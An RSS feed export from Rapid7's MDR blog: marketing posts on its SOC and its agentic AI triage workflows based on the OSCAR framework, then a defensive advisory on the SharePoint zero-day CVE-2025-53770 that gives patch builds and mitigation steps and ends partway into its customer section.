<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Managed Detection and Response (MDR) - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Mon, 28 Jul 2025 19:17:28 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/mdr-managed-detection-response/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[Staying Ahead of the Attackers: Why the Rapid7 SOC Stands Out]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>The modern security operations center (SOC) faces some very real challenges. Alert fatigue is constant. The workforce and skills gap continues to widen, and it’s not like it hasn’t been an issue for years. Meanwhile, attackers are evolving fast, using AI, automation, and novel tactics to stay ahead.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Any MDR organization can offer </span><span style='font-size: undefined;'><em>some</em></span><span style='font-size: undefined;'> support. Whether you choose a pure-play provider that brings its own technology or a BYO approach where you maintain control over platforms, most MDR offerings will give you help when you need it. Most of the time.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>But not all MDRs are created equal.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The size of the team and the flashiness of the tech stack don’t count for much if they don’t lead to better outcomes. When you’re evaluating providers, it’s easy to be drawn in by a recognizable brand or a long list of features. But the real question is this: what do those features actually deliver? After all, your goal is not more tools. It’s stronger security.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In this post, we’ll explore how service, trust, and experience directly affect your ability to stay ahead of threats. Choosing the right partner can make all the difference.</span></p><h3><span style='font-size: undefined;'>What MDR providers actually provide</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>At its core, MDR is an extension of your SOC. It fills the gaps, whether that’s expertise, bandwidth, or focus, and provides the time and attention needed to keep up with a threat landscape that never slows down. 
But the most effective MDRs don’t stand out because of their tools. They stand out because of their people.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Anyone can offer 24/7 support. But who’s on the other end of that alert? Do they understand your environment? Do they have the training, experience, and judgment to act fast and with confidence when it matters most? Do they follow through to resolution or simply pass the issue back to you?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That’s what separates a provider from a true partner.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, our SOC is built on deep, hands-on expertise. Our analysts don’t just monitor. They hunt. They proactively investigate suspicious behavior, fine-tune detections, and provide guidance based on real-world context. They know your infrastructure, your risks, and your business priorities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>And when something does go wrong, we stay with you. Rapid7 MDR includes unlimited incident response. We don’t hand off tickets or charge by the hour. We stay on the case from detection to resolution, providing full support across investigation, containment, remediation, and follow-up.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That kind of persistence and precision is what turns promises into results.</span></p><h3><span style='font-size: undefined;'>Reputations built on trust</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>In security, reputation isn’t built on branding. It’s built through outcomes. Trust comes from showing up consistently, solving problems quickly, and understanding the full picture—not just the symptoms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Think of it like buying a car. You don’t just look at the color or the dashboard screen. 
You care about the performance, the reliability, and the feel of the drive. That reputation is earned through years of engineering and design.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The same idea applies to MDR. But instead of engines and interiors, the components are world-class analysts, responsive advisors, and threat hunters who understand what makes your attack surface unique. They don’t just find threats. They help you prevent them from happening again.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em>“Why Rapid7? It’s the technology and the people. That’s the core point. It’s that true partnership.”</em></span><span style='font-size: undefined;'> -  Alan Simpson, Senior Security Operations Manager, Keyloop</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, we hear time and again that our customers value the confidence and clarity we bring to their teams. They know we understand their challenges. They trust us to act fast, stay focused, and support them with both expertise and empathy. That’s the reputation we’ve earned, and it’s one we bring to every engagement.</span></p><h3><span style='font-size: undefined;'>Why it all matters</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Your ability to detect and respond to threats quickly and decisively is what defines your security posture. In today’s environment, generic solutions and lightweight coverage simply aren’t enough.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s MDR isn’t built to check the box. It’s built to help you succeed. With unlimited incident response, proactive threat hunting, and a team that knows your environment inside and out, we don’t just provide coverage. 
We provide security that works.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because when it comes down to it, staying ahead of the attackers is what matters most. With Rapid7, you may be outnumbered - but you're never outmatched.</span></p><h3><span style='font-size: undefined;'>Keep exploring</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Want to learn how to evaluate MDR solutions based on outcomes, not just features? </span><a href="https://www.rapid7.com/lp/mdr-buyers-guide/" target="_self"><span style='font-size: undefined;'><em>Download the Complete MDR Buyer’s Guide.</em></span></a><span style='font-size: undefined;'></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/staying-ahead-of-the-attackers-why-the-rapid7-soc-stands-out</link>
      <guid isPermaLink="false">blt924dcfa38aca6fe4</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 28 Jul 2025 15:11:57 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Speed, Scale, and Immediate Action with Agentic AI Workflows for MDR]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Many aspects of what makes an investigation successful are the best parts of human intelligence: judgment, contextual awareness, and strategic thinking. But the overwhelming demands of the current security landscape — with attacker breakout times </span><a href="https://www.mckinsey.com/about-us/new-at-mckinsey-blog/ai-is-the-greatest-threat-and-defense-in-cybersecurity-today"><span style='font-size: undefined;'>now under an hour</span></a><span style='font-size: undefined;'> — narrow the window for these techniques to be applied at scale. But what if you could encode the instincts of an experienced analyst into every investigation and execute at machine speed?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For too long, security automation has meant rigid workflows and shallow actions. SOAR tools promised relief but often delivered brittle playbooks that broke with nuance or failed to adapt effectively to evolving threats or new data sources. Meanwhile, threat actors have evolved to think faster, act smarter, and scale with AI. Our defenses need to do the same.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, our view of the future of cybersecurity combines deep human expertise with intelligent systems that perceive, reason, and act with autonomy. 
Today, we’re proud to introduce </span><a href="https://www.rapid7.com/fundamentals/agentic-ai/" target="_self"><span style='font-size: undefined;'>agentic AI</span></a><span style='font-size: undefined;'> workflows, powered by the Rapid7 AI Engine: a system that brings structured thinking, deep analysis, and scalable decision-making to every investigation within our next-gen SIEM.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s global Security Operations Center (SOC) has always been driven by expert analysts who follow proven, disciplined workflows and playbooks to deliver consistent service to our customers. They work directly out of our next-gen SIEM to bring transparency and streamlined delivery to customers. Every alert is assessed rigorously: oriented, enriched, and investigated, before a response is delivered. With agentic AI workflows, we’re now scaling those principles, giving analysts and customers an AI partner capable of performing the same structured investigative process they’ve been conducting, visible in the same platform in seconds.</span></p><h2 style="direction: ltr;">Introducing agentic AI workflows to the Rapid7 SOC</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This is where things get exciting. 
With agentic AI workflows we’ve reimagined how an alert gets investigated by building an intelligent partner that knows how to think, plan, and act — and surfaces the right insights to human analysts for action.</span></p><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'></span><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9d835f8e71b23b73/6859620015ab48e2b6f52653/AG1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="AG1.png" asset-alt="AG1.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9d835f8e71b23b73/6859620015ab48e2b6f52653/AG1.png" data-sys-asset-uid="blt9d835f8e71b23b73" data-sys-asset-filename="AG1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="AG1.png" sys-style-type="display"/></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Let’s walk through how it works, step-by-step:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Getting oriented:</strong></span><span style='font-size: undefined;'> The moment an alert page loads, the agent initiates the workflow. It’s not just scanning — it’s perceiving the environment, actively taking in the alert details to build a mental model of what’s going on. Think of it as the digital equivalent of an analyst reading the room.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Calling in the specialists:</strong></span><span style='font-size: undefined;'> If the alert contains enough information, the agent taps our deterministic ML models. These are specialist models that can make fast, confident decisions — and if they can disposition the alert, the agent knows to pass it along. 
It’s teamwork in action.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Digging deeper:</strong></span><span style='font-size: undefined;'> If there’s not enough to go on, the agent doesn’t give up. Instead, it kicks off the next phase — seeking out more information, gathering related logs, history, and context. It’s re-orienting, expanding its situational awareness.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Thinking it through</strong></span><span style='font-size: undefined;'>: Now the real reasoning begins. The agent evaluates what it knows, considers what’s missing, and forms a plan. It uses our documented playbooks and best practices, combined with the gathered context, to figure out what questions to ask and how to find the answers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Executing the plan: </strong></span><span style='font-size: undefined;'>Then comes action. The agent executes its plan autonomously — querying data sources, analyzing results, connecting the dots. And importantly, it documents everything along the way. It’s like having an analyst that never loses focus.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Pulling it all together:</strong></span><span style='font-size: undefined;'> Finally, the agent steps back, reviews all the information it’s gathered, and reasons about what it all means. It forms a conclusion, identifies the next steps, and packages that insight for human analyst action. And here’s the key: the human is still in control. The Rapid7 AI Engine doesn't override; it empowers.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Everything evaluated and surfaced is transparent, traceable, and explainable. 
You can see its entire train of thought directly within our next-gen </span><a href="https://www.rapid7.com/fundamentals/siem/" target="_self"><span style='font-size: undefined;'>SIEM</span></a><span style='font-size: undefined;'> — what it did, why it did it, and how it reached its recommendation. The agentic AI workflow assembles evidence, draws conclusions, and delivers it all in a way that sharpens and accelerates human judgement, rather than replacing it. </span></p><h2 style="direction: ltr;">The OSCAR Framework: A proven methodology for investigations</h2><p style="direction: ltr;"><span style='font-size: undefined;'>At the heart of every great investigation is a proven structure. The Rapid7 SOC leverages the OSCAR framework — a repeatable, rigorous approach to alert triage and resolution. It ensures investigations are efficient, consistent, and complete. Here's how it works:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Orient</strong></span><span style='font-size: undefined;'>: Analysts begin by reviewing the initial alert signal and its metadata. They determine what’s known, what’s missing, and what context is needed to make sense of the activity.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Strategize</strong></span><span style='font-size: undefined;'>: Based on the alert type, potential severity, and initial signal clarity, the analyst forms an approach: Can the issue be resolved with current data, or will it require deeper investigation?</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Collect</strong></span><span style='font-size: undefined;'>: The analyst begins data gathering. 
This might include historical context on the user or asset, similar past alerts, endpoint activity logs, authentication records, or threat intel correlations.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Analyze</strong></span><span style='font-size: undefined;'>: With data in hand, the analyst interprets findings: looking for behavior patterns, verifying anomaly authenticity, and cross-referencing indicators of compromise or known malicious behaviors.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Report</strong></span><span style='font-size: undefined;'>: Once the investigation is complete, the analyst summarizes their findings, outlines recommended actions, and shares outcomes with the response team or customer for final decisions and remediation.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>This method isn’t just thorough, it’s teachable, scalable, and ideal for embedding into an intelligent system. With agentic AI, every step of OSCAR can be mirrored, executed autonomously, and presented for human validation to deliver speed without compromising depth.</span></p><h2 style="direction: ltr;">Engineered for trust, built for scale</h2><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, AI isn’t a bolt-on or a black box. It’s a deeply integrated component of our </span><a href="https://www.rapid7.com/products/insightidr/" target="_self"><span style='font-size: undefined;'>next-gen SIEM</span></a><span style='font-size: undefined;'>, trained on workflows designed by our own SOC experts, and refined through continuous real-world application. 
Today, we’ve built the </span><a href="https://www.rapid7.com/blog/post/2025/03/11/helping-us-help-you-practical-applications-of-ai-in-the-soc/"><span style='font-size: undefined;'>Rapid7 AI Engine</span></a><span style='font-size: undefined;'> to inject intelligence directly within the SOC workflow, flagging anomalous behavior, triaging alerts with leading accuracy, working through the investigation lifecycle, and delivering transparent outputs for analysts and customers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>But trust isn’t just about delivering results. It’s about how those results are achieved, and whether customers can understand, verify, and rely on them. That’s why our approach to AI is grounded in our TRiSM framework: Transparency, Risk management, Security, and Model governance.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We’ve aligned our practices with leading standards like the NIST AI Risk Management Framework and the Open Standard for Responsible AI. That means we build AI systems with clear safeguards, evaluate them throughout their lifecycle, and hold ourselves accountable for their behavior. Transparency isn’t an afterthought; it’s built in, with every action logged and explainable inside InsightIDR.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For us, AI isn’t just a feature — it’s a responsibility. 
And we’re committed to innovating in a way that’s not only intelligent, but also intentional, delivering real results for SOCs around the world:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>200+ analyst hours saved per week</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Reduced false positives with 99.93% AI triage benign disposition accuracy</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Zero friction for customers</span></p></li></ul><h2 style="direction: ltr;">The future of investigations is here</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Agentic AI workflows are now starting to roll out for all MDR customers. Want to learn how Rapid7’s </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/" target="_self"><span style='font-size: undefined;'>Managed Detection and Response service</span></a><span style='font-size: undefined;'> can help your team scale smarter and respond faster? Reach out to our team to see how agentic AI can elevate your security outcomes from day one.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/speed-scale-and-immediate-action-with-agentic-ai-workflows-for-mdr</link>
      <guid isPermaLink="false">bltbb02d648c856ee11</guid>
      <category><![CDATA[Artificial Intelligence]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Laura Ellis]]></dc:creator>
      <pubDate>Fri, 25 Jul 2025 13:51:05 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0b0762ca94c50b0b/6846a711eac0e395093e52e3/AI.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Human Framework, Machine Speed: Scaling SOC Judgment Through Agentic AI]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>In security operations, structure is a necessity. The OSCAR framework, which originated in a 2012 book about network forensics investigations, provides a disciplined approach to full scale detection and response – and it has long been the investigative backbone of the Rapid7 SOC. When stakes are high and time is limited, the framework delivers, while something flashier and more theoretical might not. But as attack surfaces expand and the tempo of threats increases, the feasibility of applying that structure consistently across thousands of alerts without intelligent assistance is diminishing.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With our </span><a href="https://www.rapid7.com/about/press-releases/rapid7-puts-agentic-ai-to-work-in-the-soc-empowering-analysts-to-investigate-smarter-and-faster/"><span style='font-size: undefined;'>recently announced agentic AI workflows</span></a><span style='font-size: undefined;'>, we're encoding OSCAR as a model of reasoning by embedding a disciplined investigation strategy directly into our next-gen SIEM. This operationalizes analysts’ best habits at speed and scale, and extends their ability to make informed decisions using the investigative discipline they already rely on.</span></p><h2><span style='color:rgb(67, 67, 67);'>OSCAR, encoded with intent </span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Every investigation begins with </span><span style='font-size: undefined;'><strong>Obtain</strong></span><span style='font-size: undefined;'>, a phase that goes beyond reading the alert. The AI agent builds a mental map; it parses the alert signal, evaluates metadata against current asset intelligence, and identifies what context is immediately available versus what is missing. 
For example, it may assess whether the impacted system recently changed users, is running newly deployed software, or sits within a sensitive network segment. This orientation defines the scope and hypotheses for the investigation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In </span><span style='font-size: undefined;'><strong>Strategize</strong></span><span style='font-size: undefined;'>, the agent draws from documented playbooks, but doesn’t follow them blindly. It assesses the volatility of the signal, the confidence level of any existing model classifications, and even prior alert outcomes for similar contexts. Is this a routine trigger, or does the surrounding telemetry suggest escalation potential? Strategizing helps map the right approach and keep the investigation focused and proportionate to the risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='font-size: undefined;'><strong>Collect</strong></span><span style='font-size: undefined;'> phase prioritizes relevance over volume. The agent interrogates sources contextually by reviewing alert history, target system behavior, and related log data to assemble a coherent picture. This is built to include user behavior analytics, endpoint telemetry, and enrichment from </span><a href="/fundamentals/what-is-threat-intelligence/" target="_self"><span style='font-size: undefined;'>threat intelligence</span></a><span style='font-size: undefined;'>. Rather than defaulting to static queries, it adapts based on mid-investigation findings. 
If an unusual parent process emerges, it expands to include sibling process behavior; if geolocation anomalies surface, it pivots to identity and access logs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>During </span><span style='font-size: undefined;'><strong>Analyze</strong></span><span style='font-size: undefined;'>, the system applies behavioral modeling, pattern matching, and sequence reconstruction to weigh potential indicators of compromise. It surfaces inconsistencies, outliers, and supporting evidence, correlating across multiple data points to form defensible narratives. Reflecting how real analysts work, this process is iterative, contextual, and grounded in human judgment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In </span><span style='font-size: undefined;'><strong>Report</strong></span><span style='font-size: undefined;'>, the agent compiles its findings with structured rationale: outlining the chain of logic, the confidence of disposition, and any assumptions made along the way. 
This delivers both a conclusion and a clear account of how that conclusion was reached, arming analysts with context they can trust and act on.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This applied investigation logic – designed to be transparent, traceable, and aligned with analyst intuition – represents a significant expansion beyond workflow automation without compromising consistency.</span></p><h2><span style='color:rgb(67, 67, 67);'>What it means for customers</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>We’re already seeing the impact of AI in the Rapid7 SOC:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>200+ analyst hours saved per week</strong></span><span style='font-size: undefined;'>, reducing fatigue and reallocating talent to proactive defense.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>99.93% benign disposition accuracy</strong></span><span style='font-size: undefined;'>, driving confidence in triage precision.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Seamless transparency via the SIEM</strong></span><span style='font-size: undefined;'>, enabling agentic outputs to appear alongside traditional investigation artifacts.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The efficiency gains within our SOC, and resulting benefits for customers, reflect a shift in how work gets done today. With foundational triage increasingly handled by the AI engine, analysts can now focus their time and cognitive energy on the complex, ambiguous, or higher-stakes investigations that benefit most from human insight. 
This allows SOCs to respond faster and smarter, tackling multi-stage intrusions, lateral movement, and evasive behaviors with more focus and fewer distractions.</span></p><p style="direction: ltr;"><a href="/fundamentals/agentic-ai/" target="_self"><span style='font-size: undefined;'>Agentic AI </span></a><span style='font-size: undefined;'>enables every alert to benefit from the same structured scrutiny our top analysts bring to priority cases – ensuring quality doesn’t degrade with volume and empowering analysts to elevate their role in the detection and response lifecycle.</span></p><h2><span style='color:rgb(67, 67, 67);'>Structured reasoning, transparent execution</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Trust in </span><a href="/fundamentals/artificial-intelligence/" target="_self"><span style='font-size: undefined;'>AI</span></a><span style='font-size: undefined;'> needs more than results, it requires clarity and evidence. That’s why every action taken by the agent is recorded and explainable. Security leaders can inspect both the outcome and the thought process, providing auditability for internal teams and external stakeholders alike.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With agentic AI and the OSCAR framework, we’re scaling human judgment with machine speed. And in today’s threat landscape, that may be the most important shift a SOC can make. To learn more about how agentic AI is empowering </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/" target="_self"><span style='font-size: undefined;'>Rapid7 MDR</span></a><span style='font-size: undefined;'>, get in touch with an expert.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/human-framework-machine-speed-scaling-soc-judgment-through-agentic-ai</link>
      <guid isPermaLink="false">blt642f8f17724e9df2</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Artificial Intelligence]]></category><dc:creator><![CDATA[Jon Hencinski]]></dc:creator>
      <pubDate>Fri, 25 Jul 2025 13:42:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0b0762ca94c50b0b/6846a711eac0e395093e52e3/AI.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On Saturday July 19, 2025, Microsoft released an advisory for </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770"><span style='font-size: undefined;'>CVE-2025-53770</span></a><span style='font-size: undefined;'>, a critical Remote Code Execution (RCE) vulnerability affecting on-premises SharePoint servers. </span><span style='font-size: undefined;'><strong>This vulnerability has been exploited in the wild as a zero-day by an unknown threat actor prior to the disclosure from Microsoft. </strong></span><span style='font-size: undefined;'>The vulnerability is described as an unauthenticated deserialization of untrusted data issue, and has a CVSS base score of 9.8 (Critical). </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability is being used in widespread, aggressive campaigns to achieve RCE, establish persistent access, and extract cryptographic keys that allow attackers to forge valid authentication tokens. This campaign is not opportunistic - it is deliberate, capable, and designed for persistence even after patching. Rapid7 has observed active exploitation in customer environments and is sharing indicators of compromise and detection guidance to help defenders respond quickly.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft has described CVE-2025-53770 as being related to a previous vulnerability, </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704"><span style='font-size: undefined;'>CVE-2025-49704</span></a><span style='font-size: undefined;'>. CVE-2025-49704 was patched in the July 2025 update. It appears that the new vulnerability, CVE-2025-53770, is a patch bypass. 
Microsoft has indicated that the patches for the new vulnerability, CVE-2025-53770, include more “robust protections” than the July update for the previous vulnerability CVE-2025-49704.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft has also released an advisory for a second new vulnerability, </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771"><span style='font-size: undefined;'>CVE-2025-53771</span></a><span style='font-size: undefined;'>. It is currently unclear if this second vulnerability is also being exploited in the wild as part of an exploit chain with CVE-2025-53770. Microsoft has indicated that the patches for CVE-2025-53771 also include more “robust protections” than the July update for another previous vulnerability CVE-2025-49706.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To understand why the two new vulnerabilities CVE-2025-53770 and CVE-2025-53771 are related to two previous vulnerabilities CVE-2025-49704 and CVE-2025-49706, we must clarify what those older vulnerabilities are.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The previous vulnerability, CVE-2025-49704, was part of an exploit chain demonstrated at the </span><a href="https://www.zerodayinitiative.com/blog/2025/5/16/pwn2own-berlin-2025-day-two-results"><span style='font-size: undefined;'>Pwn2Own</span></a><span style='font-size: undefined;'> hacking competition in May of 2025. 
During the competition, Viettel Cyber Security chained together two vulnerabilities, an authentication bypass (</span><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-580/"><span style='font-size: undefined;'>CVE-2025-49706</span></a><span style='font-size: undefined;'>) and a deserialization of untrusted data vulnerability (</span><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-581/"><span style='font-size: undefined;'>CVE-2025-49704</span></a><span style='font-size: undefined;'>), to achieve unauthenticated RCE. The Pwn2Own exploit chain from May 2025 was dubbed “</span><a href="https://x.com/codewhitesec/status/1944743478350557232"><span style='font-size: undefined;'>ToolShell</span></a><span style='font-size: undefined;'>”. The new vulnerability, CVE-2025-53770, currently being exploited in the wild appears to be a patch bypass for CVE-2025-49704. It also appears that CVE-2025-53771 is a patch bypass for CVE-2025-49706; however, Microsoft has indicated that CVE-2025-53771 has not been exploited in the wild.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On Sunday, July 20, 2025, CISA added CVE-2025-53770 to the </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>Known Exploited Vulnerabilities</span></a><span style='font-size: undefined;'> (KEV) catalog.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The vendor has begun to supply patches for affected SharePoint editions. 
Customers are advised to follow the vendor guidance, and remediate this vulnerability by upgrading to a fixed version on </span><span style='font-size: undefined;'><strong>an emergency basis</strong></span><span style='font-size: undefined;'>, without waiting for a regular patch cycle to occur.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server Subscription Edition is fixed in build </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.18526.20508</span></span><span style='font-size: undefined;'> (</span><a href="https://www.microsoft.com/en-us/download/details.aspx?id=108285"><span style='font-size: undefined;'>KB5002768</span></a><span style='font-size: undefined;'>).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server 2019 is fixed in build </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.10417.20037</span></span><span style='font-size: undefined;'> (</span><a href="https://www.microsoft.com/en-us/download/details.aspx?id=108286"><span style='font-size: undefined;'>KB5002754</span></a><span style='font-size: undefined;'>).</span></p></li><li><span style='font-size: undefined;'>Microsoft SharePoint Enterprise Server 2016 is fixed in build </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.5513.1001</span></span><span style='font-size: undefined;'> (</span><a href="https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-enterprise-server-2016-july-21-2025-kb5002760-3ba63c92-23dd-4a1c-9f23-6dbcca9447ed"><span style='font-size: undefined;'>KB5002760</span></a><span style='font-size: undefined;'>).</span></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a 
href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to applying available mitigations, organizations should:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Conduct a compromise assessment, especially if SharePoint is exposed externally. Exploitation predates the advisory, so applying the patch does not by itself establish that a server is clean.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Rotate the ASP.NET machine keys (</span><span style='font-size: undefined;'><span data-type='inlineCode'>ValidationKey</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>DecryptionKey</span></span><span style='font-size: undefined;'>) after the patch is applied, then restart IIS so the new keys take effect. Keys extracted before rotation remain valid for signing payloads whether or not the server is patched, so patching without rotating leaves a compromised server open.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Monitor for anomalous behavior on SharePoint servers and investigate any unauthorized ASPX file activity, in particular new files under the LAYOUTS directory.</span></p></li></ul><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>MDR</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR is actively detecting this activity via behavioral analytics. 
